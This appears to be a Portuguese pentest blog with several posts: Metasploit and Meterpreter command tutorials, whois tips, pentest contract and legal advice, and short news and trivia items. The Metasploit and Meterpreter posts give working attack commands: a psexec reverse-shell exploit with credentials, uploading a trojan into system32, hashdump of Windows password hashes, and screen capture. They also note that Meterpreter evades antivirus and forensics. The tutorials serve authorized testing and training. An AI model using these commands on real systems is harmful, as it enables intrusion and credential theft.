– root@injetionsec:~#

Comandos do metasploit – part 3

26.09.2014 (9:55 pm) – Filed under: Pentest ::

Veja :

comandos do metasploit – parte 1
comandos do metasploit – parte 2

Vamos falar um pouco do meterpreter galera,

Meterpreter : o meterpreter e um payload avançado,como ja falamos um injeção em DDL,se comunica atraves de sockets,com API em ruby e como ele funciona,vejamos

– Carrega a DLL com a carga do payload e injetando na DLL
– O nucleo do meterpreter estabelece uma conexão enviando assim um GET , e assim o metasploit recebe o GET e configura o cliente
– por ultimo os payloads do meterpreter carrga os modulos proporcinando assim acesso adminisrativos

– O meterpreter resite na memoria não escrevendo nada em disco
– Não e criado um novo processo com o meterpreter ele injeta um processo comprometido e pode migragar para outros processo que estão em execução com maior facilidade
– Utiliza comunicação cifrada
– Praticas forences convencionais são dificeis de ver os rastros
– Meterpreter utiliza um sistema de comunicações canalizado
– Todos esses processos são transparentes e completam isso tudo em 1 segundo.

vejamos alguns comandos do meterpreter

– help : e um comando que mostra um menu de ajuda do meterpreter

meterpreter > help

– backtround : esde comando envia a sessão atual do meterpreter para segundo plano,para voltar para sessão atual simplesmente digite o seguinte comando “sessions -i 1”

– ps : este comando mostras os processos que esta sendo executado na maquina alvo

meterpreter > ps

– migrate : com esse comando podemos migra para outro processo da vitima

meterpreter > run post/windows/manage/migrate

– ls : lista o diretorio que estamos

meterpreter > ls

– download : pode fazer um download de qualquer arquivo (utilize \\)

meterpreter > download c:\\boot.ini

– upload : podemos fazer um upload de por exemplo um arquivo qualquer ou arquivo malicioso (utilize \\)

meterpreter > upload evil_trojan.exe c:\\windows\\system32

– ifconfig : esse comando mostra as configurações da interface de rede

meterpreter > ifconfig

– getuid : este comando mostra o usuario ue esta sendo executado naquele determinado host

meterpreter > getuid

– execute : esse comando executa um determinado comando

meterpreter > execute -f cmd.exe -i -H

– shell : este comando apresenta o shell do sistema

meterpreter > shell

– idletime : esse comando mostra quanto tempo a maquina esta ativada

meterpreter > idletime

Bem galera esse foram alguns dos comando básico do meterpreter , ate o próximo tópico =)

Comandos do metasploit – part 2

26.09.2014 (1:52 pm) – Filed under: Pentest ::

Veja : comandos do metasploit – parte 1

continuando a nossa série de post sobre alguns comando do metasploit galera =D

setg & unsetg: podemos configurar as variaveis globais dentro do metasploit com o seguinte comando “setg” uma vez estabelecido podemos utiliza-lo para muitos exploits e modulos auxiliares que quisermos,podemos tambem guarda-los para ser usado na proxima vez que usarmos o framework,caso não queira mais guardar essas configurações você pode utilizar o “unsetg” para assim eliminar as variaveis globais, um exemplo seria assim:
msf > setg LHOST 192.168.3.104
LHOST => 192.168.3.104
msf > setg RHOSTS 192.168.3.0/24
RHOSTS => 192.168.3.0/24
msf > setg RHOST 192.168.3.143
RHOST => 192.168.3.43

Depois de guardas as configurações dessas variaveis podemos executar o seguinte comando save para salvar as configurações atuais, com essas ajustes podemos carregar automaticamente assim evitando de você ter que digitar toda hora os comandos para “setar” as configurações

msf > save
Saved configuration to: /root/.msf3/config

EXPLOIT ATIVO

Logo apos o exploit esta ativo na alvo,temos que obter um shell reverso,tomamos como  exemplo:

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.3.107
RHOST => 192.168.3.107
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.3.109
LHOST => 192.168.3.109
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER teste
SMBUSER => teste
msf exploit(psexec) > set SMBPASS password
SMBPASS => password
msf exploit(psexec) > exploit
(….)
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.3.19:4444 -> 192.168.3.107:1073)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

background & sessions: Usando o comando backtround colocamos a sessão atual em segundo plano para voltar para sessão usando o seguinte comando “sessions -l” isso vai nos trazer de volta para o console Metasploit sem terminar a sessão,podemos também interagir com o metasploit iniciando uma nova sessão com o seguinte comando “sessions -i 1” iniciando assim uma sessão no Metasploit.

Payloads: podemos encontrar 3 diferentes tipos de payloads no metasploit: singles,stagers,stages; esses tipos permitem uma grande variedade que pode ser uteis.

* singles – são payloads que são automatos e independentes,pode ser algo simples como adicionar um usuario no sistema e assim executar serviços

* Stagers – configuração de um conexeção entre o atacante e a vitima

Vejamos alguns tipos de payloads disponíveis no metasploit:

* Inline: e um simples payload que contem um exploit com um codigo de shell completo para ser selecionado,são mais estaveis em algum quesitos.

* Staged : trabalham em conjunto com o payload realizando o trabalho mais especifico,exemplo um serviço estabelece um canal de comunicação entre o atacante e a vitima ele le uma carga e assim ejecuta a etapa no host remoto

* Meterpreter : ou meta-interprete opera atravez de injeção nas bibliotecas DLL,reside por completo na memoria da maquina,muito dificil de ser detectada com as tecnicas forences convencionais, os comandos e os plugins carregados dinamicamente estão em constante evolução

* PassiveX : e um payload que pode ajudar a baypassar as restrições dos firewall, mediante ao uso de ActiveX para criar instancias ocultas nos navegadores,usando assim um novo para se comunicar com atacaten através de solicitações e respostas em HTTP

* NoNX : o NX(não executa)e uma caracteristica integrada em algumas CPUs para evitar que algum codigo carrega em certas areas de memoria, em windows o NX e implementado como DEP (data execution prevention) esses pauloads do metasploit NoNX estão destinados a baypass o DEP

— Gerando payload: durante o processo de exploit e mais seguro caso seja necessario gerar um codigo em shell para utilizar na exploração, o metasploit pode gerar com o seguinte comando “generate”

msf > use payload/windows/shell/bind_tcp
msf payload(bind_tcp) > help

Para gerar um codigo sem nenhuma opção fazermos da seguinte forma:

msf payload(bind_tcp) > generate

fico por aqui galera ate o próximo post *.*

Comandos do metasploit – part 1

25.09.2014 (10:42 pm) – Filed under: Pentest ::

O comando irb coloca uma shell interpretadora em ruby para executar comandos e scripts criados.

msf > irb

Podemos trabalhar com os módulos em segundo plano,o comando jobs lista para nos as possibilidades de como trabalhar

msf  exploit(ms03_049_netapi) > jobs -h

A palavra “path” busca dentro o caminho dos módulos

msf > search patch:scada

Podemos usar esse comando para procurar um determinado caminho de uma modulo no sistema

msf > search platform:linux
msf > search platform:windows

Caso queira filtrar os tipos de modulos como auxiliary,post,exploit e etc

msf > search type:auxiliary

Ha uma seria de comando “show” que podemos utilizar os mais frequentes são “show auxiliary”, “show exploits” , “show payloads” , “show nops”,vamos falar um pouco de cada um.

– show auxiliary : mostra um lista de todos os tipos de modulos auxiliares disponiveis no metasploit,como modulos de scanner,DDoS,fuzzers, e etc.

msf > show auxiliary

– show exploits : esse e comando mais interessante pois trata dos exploits que se encontra no metasploit e obtem uma lista de todos os exploits incluídos no framework

msf > show exploits

show payloads : mostra todos os diferentes payloads de todas as plataformas disponiveis no metasploit,quando você executa um determinado exploit e depois executamos o “show payloads” ele mostrara os payloads que e compativeis com os exploit em particular,por exemplo e uma vulnerabilidade do windows ou de outro sistema

msf > show payloads

show options : ao selecionar um exploit especifico você pode digitar o “show options” para ver as opções diponíveis/necessárias naquele modulo específico

msf exploit(ms06_040_netapi) > show payload

show targets : se não tem certeza de que aquele exploit e de um determinado SO em particular, esse comando mostra os exploits compativeis com o determinado sistema operacional

msf exploit(ms06_040_netapi) > show targets

– show advanced: e uma função mais avançada de um determinado exploit

msf exploit(ms06_040_netapi) > show advanced

show encoders : se mostra um lista dos codificadores disponiveis no metasploit

msf > show encoders

show nops : mostra os geradores NOP que o metasploit tem a oferecer

msf > show nops

Fico por aqui galera ate á próxima parte =)

Mais consultas com whois

23.09.2014 (9:42 pm) – Filed under: Redes ::

O whois alem de apenas consultar servidores se você quiser obter informações de um determinado IP associado podemos fazer da seguinte forma:

whois -i [atributo][valor]

Vamos procurar informações sobre todos os endereços mantidos pelo Yahoo vejamos o comando:

whois -i mnt-by YAHOO-MNT

Caso queira filtrar os endereços IP a partir de uma consulta,podemos usar o grep é também com o wak da seguinte forma

whois -i mnt-by YAHOO-MNT | grep inetnum
whois –i mnt-by YAHOO-MNT | grep inetnum | awk –F\: ‘{ print $2 }’

Podemos usar outros atributos para fazer consultas inversas :

-i admin-c [NIC-handle ou pessoa]
-i person [NIC-handle ou pessoa]
-i nsserver [dominio,endereço,prefixo ou endereço unico]
-i sub-dom [dominio]
-i upd-to [email]

Caso queira pode consultar as paginas do manual do linux man whois para saber sobre mais comando e etc

=)

Como conduzir um teste de invasão,algumas dicas

18.09.2014 (5:57 pm) – Filed under: Pentest ::

Algumas dicas de como conduzir o pentest nos clientes que você for realizar o trabalho galera.

* Converse com seu cliente sobre as necessidades do teste a ser feito,não podemos deixar nada a desejar nessa parte de ante do cliente,e nessa parte que definimos o escopo,tipo de teste a ser realizado,o que e permitido e o que não é permitido no teste que estamos fazendo

* Preparação do contrato de serviço é de suma importãncia pedindo assim que o cliente assine,é feito um contrato de prestação de serviço, onde está descrito o que será realizado (escopo, horários, equipe de profissionais, permissões, etc) e assinado por contratado e contratante.

Além do contrato de seriviço,temos que fazer um contrato de sigilo,o NDA (non disclosure agreement), definindo que as informações que a equipe obteve, não serão revelados ou divulgados, excetuando-se à pessoa que assinou o contrato de prestação de serviço.

* Prepare então os profissionais que vão fazer o teste e o agende,caso tenha mais profissionais na equipe,é passado todas as informações pertinentes ao que será realizado,com isso cada profissional vai exercer sua devida função/pentest a ser realizado.

* Realização do teste em si,nesse passo é onde o teste é executado,lembrando de sempre seguir o que foi acordado com o cliente e respeitar as cláusulas do contrato e NDA assinados no ato.

* Essa e parte á meu ver mais importante,depois de analisar os resultados então e preparado um relatório,com todas as informações coletadas, resultados obtidos e ocorrências durante a realização do teste são posteriormente reunidas e analisadas. Os resultados dessas análises são colocados em um relatório, contextualizados, e é feita a descrição, explicação e possível solução para cada falha encontrada e explorada.

* A entrega do relatório ao cliente é entregue APENAS para a pessoa responsável pela contrata-
ção do teste de invasão, ou definido no contrato,porque a maioria das informações contidas em tal relatório são extremamente sensíveis, deve-se tomar o máximo cuidado possível para que o mesmo não caia nas mãos de pessoas sem autorização para ter acesso ao mesmo.

E até importante é ideal que a equipe que realizou o pentest não guarde nem mesmo uma cópia do relatório, e isso deve ser definido no NDA e no contrato de serviço,isso é fato para evitar qualquer vazamento de informações sensíveis e importante.

> Os aspectos legais

Devemos lembrar que qualquer que seja o pentest realizado sem a devida permissão e crime.

Temos que ter em mente um contrato prévio assinado pelo cliente,onde sera definido alguns requisitos :

– Limites dos testes, “ate onde posso ir ?”
– Horários com período de menor utilização ou menos críticos
– Uma equipe de suporte se o ataque tiver algum efeito mais drástico
– Contatos de pelos menos três pessoas como e-mail,endereço e telefone
– Permissão devidamente assinada pelo responsavel da empresa e com os devidos nomes das equipes autorizadas a realizar o testes

Dentro do que foi acordado, devemos ter o máximo cuidado para não causar comprometimentos que tragam algum tipo de prejuízo ao cliente, como a indisponibilidade de informações,se possível, é interessante reproduzir o ambiente de testes em máquina virtual para tentar aproximar-se do possível comportamento do ambiente antes de iniciarmos os testes,isso evitaria a maior parte dos comprometimentos não planejados à infraestrutura do cliente.

Fico por aqui galera =)

Curiosidade sobre um pássaro

18.09.2014 (5:47 pm) – Filed under: Curiosidades ::

Galera lendo um livro de Física para entender alguns conceitos  de movimento retilíneo achei interessante essa curiosidade.

Como o pica-pau pode sobreviver aos impactos de seu bico na árvore.

A aceleração tipica da cabeça de um pica-pau e aproximadamente 70 vezes maior,certamente seria mortal para o ser humano,mas a capacidade desse pássaro de suportar acelerações tão elevadas ainda não foi bem explicada,existe 2 teorias principais:

1o- O movimento do pica-pau e quase retilinio, diferente dos seres humanos e de algum animais se fizer isso pode trazer sérios dados no pescoço

2o – O cérebro do pica-pau está tão firme e preso ao crânio que as duas estruturas se movem em uníssono,o que minimiza os efeitos da aceleração

Usuarios Linux

18.09.2014 (1:25 pm) – Filed under: Humor ::

Achei muito legal essas imagens abaixo galera, dos usuários que usam linux ….ahahahh,para melhor visualização clique em cima da imagem.

barba_linuxuser_linux

 

5 milhões de contas do Google vazaram

10.09.2014 (7:56 pm) – Filed under: Noticias ::

Um banco de dados contendo mais de 5 milhões de contas do Google (ID de login e senhas) foi divulgado no forum russo chamado forum.btcsec.com. Os IDs de usuário e senhas em sua maioria pertenciam a usuários russos do Google.

O arquivo vazado que contém nome de usuário e senhas em texto simples foi publicado na terça-feira sob,os administrador do fórum, desde então, removido as senhas do arquivo, deixando apenas os nomes de usuário a partir de agora. O vazamento foi então publicada no Reddit por mstrokin , onde nos comentários o link para todo o vazamento  foi upado no servidores do mega e está disponível.

O arquivo publicado cerca de 60% eram válidos,o Google da Rússia disse que está investigando o vazamento, o que sugere que os consumidores utilizem senha forte e permitem a verificação de login em dois passos para a máxima proteção,a maioria das contas foram coletados a partir de sites/app usando phishing,mais informações podem ser vista techworm e sensecy.com

 

Vms para estudos

10.09.2014 (12:59 pm) – Filed under: Dicas ::

achei interessante galera esse site VulnHub tem um monte de labs com umas vms para estudos:
http://vulnhub.com

Alguns Comandos do Meterpreter

09.09.2014 (11:55 am) – Filed under: Pentest ::

8u0j

bem galera em auditorias que faço, sempre quando conseguimos ter acesso ao sistema,tentamos explora-lo para pegar algumas informações sensíveis para poder ver a gravidade da questão.

Vamos falar um pouquinho do meterpreter que é um payload que  e executado depois do processo de exploração,vulnerabilidade de um sistema operacional, meterpreter e o diminutivo de meta-interprete,ele executa completamente na memoria; evitando assim problemas com antivirus,algumas características são:

1. Eliminação de arquivos de logs.
2. Captura de tela.
3. Carga e descarga de arquivos.
4. Copiar informação.
5. Extração de informação e configuração como: tabelas de roteamento, registro do windows, configurações de segurança, compartilhamento de arquivos, configurações de firewall e etc.

COMANDOS

– Background
Executa na sessão atual  um segundo plano para retornar  a linha de do meterpreter, para regressar a  sessão executamos os seguinte comando

meterpreter > sessions –i 1

– Migrate
Permite migrar  o processo para maquina da vitima

meterpreter > migrate [numero processo]

– File Systems Commands
Permite visualizar os arquivos  no diretorio atual el directorio remoto atual

meterpreter > ls

– Download
Permite baixar os arquivos de um diretório da maquina maquina atacada

meterpreter > download c:\\boot.ini

– Upload
Permite enviar um arquivo especifico para a maquina atacada

meterpreter > upload  trojan.exe  c:\\windows\\system32

– Search
Permite buscar arquivos na maquina da vitima

meterpreter > search -f  *.pdf

caso queira apontar para um diretório você vai ter que fazer da seguinte forma

meterpreter > search -d c:\\Users  -f *.pdf

– Comandos de Redes
Podemos usar alguns comandos de rede para ver as informações da rede da maquina atacada

meterpreter > ifconfig
meterpreter > route

– Comando do sistema
Podemos executar alguns comandos do sistemas

meterpreter > execute  -f cmd.exe  -i  -H
esse comando ira mostra o ID do processo criado, juntamente com o fingerprint do sistema operacional

– Getprivs
Permite vermos os privilégios do administrador do sistema

meterpreter > getprivs

– Ps
Permite ver os processos que estão rodando na maquina alvo

meterpreter > ps

– Systeminfo
Permite obter informação dos sistema operacional como
1. Nome da maquina.
2. Sistema Operacional.
3. Tipo de arquitetura.
4. Linguagem do sistema operacional.

meterpreter > systeminfo

COMANDOS DE INTERFACE DE USUARIO

– Enumdesktops
Permite consultar todas as sessão dos computadores

meterpreter > enumdesktops

– Idletime
Permite consultar o tempo que o usuário esta logado no sistema

meterpreter > idletime

– Screenshot
Permite dar um print e ver o que o usuário esta fazendo na tela da maquina

meterpreter > screenshot

– Uictl
Permite controlar alguns componentes do sistema afetado.

meterpreter > uictl

– Hashdump
Permite consultar o que contem dentro da base de dados do arquivo SAM do sistemas windows

meterpreter > hashdump

galera vocês podem ver mais comandos nesse  post feito como um extensão.

ate a próxima =)